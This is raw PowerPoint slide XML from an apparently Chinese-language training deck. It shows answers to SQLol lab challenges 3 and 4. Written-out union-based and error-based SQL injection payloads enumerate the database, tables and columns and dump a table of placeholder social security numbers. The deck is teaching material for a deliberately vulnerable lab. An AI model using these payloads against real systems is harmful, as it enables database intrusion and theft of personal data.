            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1770293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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>答案</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="836712"/>
            <a:ext cx="10972800" cy="5145435"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>查找数据库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>and 1=2 union select </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>concat_ws</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(char(32,58,32),user(),database(),version()) </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>Array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> ( [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>pte@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>sqlol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> : 5.5.56-MariaDB ) </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> 查找表</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>' and 1=2 union all select TABLE_NAME from </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>information_schema.TABLES</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> where TABLE_SCHEMA='</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>sqlol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LIMIT 1 OFFSET 1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>;  #</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t> ( [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t> ) </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t> ( [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t> ) </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> 查找列</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>' and 1=2 union select COLUMN_NAME from </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>information_schema.COLUMNS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> where TABLE_NAME='</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>'; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LIMIT 1 OFFSET 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Array ( [username] =&gt; name ) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Array </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> ) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>显示所有字段</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>' and 1=2 union select </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>concat_ws</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(char(32,58,32),name , </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> ) from </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LIMIT 1 OFFSET 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Array ( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>Wengdack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>Slobdegoob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> : 000-00-1112 ) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Array </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>Herp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>Derper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> : 012-34-5678 ) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Array </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>( [username] =&gt; Peter Weiner : 111-22-3333 ) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Array </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>( [username] =&gt; Chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>MacRunfast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> : 666-67-6776 ) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Array </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>SlapdeBack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>LovedeFace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> : 999-99-9999 ) </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2014869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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>mcir.pte.com/sqlol/challenges/challenge4.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要求：找到社会安全码表，显示内容。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询结果不能显示，需要构造语句到错误显示处。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - SELECT </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不过滤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>没有返回语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，错误</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>无</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>语句</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="450478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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>答案</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="836712"/>
            <a:ext cx="10972800" cy="5145435"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>查找数据库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>' and (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(0x7e,(select </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>concat_ws</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(char(32,58,32),user(),database()))))) and '1'='1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
